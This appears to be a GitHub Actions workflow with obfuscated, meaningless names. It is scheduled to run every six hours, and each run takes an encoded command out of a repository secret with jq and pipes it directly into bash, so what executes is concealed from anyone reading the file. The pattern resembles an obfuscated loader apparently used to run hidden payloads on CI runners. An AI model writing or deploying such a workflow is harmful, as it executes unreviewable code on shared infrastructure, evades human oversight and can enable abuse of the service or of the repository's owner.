name: charcoalterrorist
on:
  workflow_dispatch:
  schedule:
    - cron: '57 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: charcoalterrorist
        env:
          cysv60914: ${{ secrets.cysv60914 }}
        run: |
          echo $cysv60914 | jq -r .c855 | /bin/bash
          echo $qdyu59412 | jq -r .hp9082 | /bin/bash

